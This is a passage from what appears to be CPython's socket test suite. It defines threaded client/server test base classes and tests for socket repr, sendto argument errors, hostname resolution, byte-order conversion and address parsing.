HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
HAVE_SOCKET_BLUETOOTH = _have_socket_bluetooth()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = socket_helper.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = socket_helper.bind_port(self.serv)
class ThreadSafeCleanupTestCase:
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = socket_helper.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.setUp = self._setUp
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = threading_helper.wait_threads_exit()
self.wait_threads.__enter__()
self.addCleanup(self.wait_threads.__exit__, None, None, None)
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
def raise_queued_exception():
if self.queue.qsize():
raise self.queue.get()
self.addCleanup(raise_queued_exception)
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
self.addCleanup(self.done.wait)
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
socket_helper.bind_unix_socket(sock, path)
self.addCleanup(os_helper.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
socket_helper.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = socket_helper.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
support.gc_collect() # For PyPy or other GCs.
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test3542SocketOptions(self):
# Ref. issue #35569 and https://tools.ietf.org/html/rfc3542
opts = {
'IPV6_CHECKSUM',
'IPV6_DONTFRAG',
'IPV6_DSTOPTS',
'IPV6_HOPLIMIT',
'IPV6_HOPOPTS',
'IPV6_NEXTHOP',
'IPV6_PATHMTU',
'IPV6_PKTINFO',
'IPV6_RECVDSTOPTS',
'IPV6_RECVHOPLIMIT',
'IPV6_RECVHOPOPTS',
'IPV6_RECVPATHMTU',
'IPV6_RECVPKTINFO',
'IPV6_RECVRTHDR',
'IPV6_RECVTCLASS',
'IPV6_RTHDR',
'IPV6_RTHDRDSTOPTS',
'IPV6_RTHDR_TYPE_0',
'IPV6_TCLASS',
'IPV6_USE_MIN_MTU',
}
for opt in opts:
self.assertTrue(
hasattr(socket, opt), f"Missing RFC3542 socket option '{opt}'"
)
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [socket_helper.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test socket_helper.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [socket_helper.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS and AT&T, may successfully
# resolve these IPs. In particular, AT&T's DNS Error Assist service
# will break this test. See https://bugs.python.org/issue42092 for a
# workaround.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = (
l_bad_values +
[_testcapi.INT_MIN-1, _testcapi.INT_MAX+1] +
[1 << 16, _testcapi.INT_MAX]
)
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
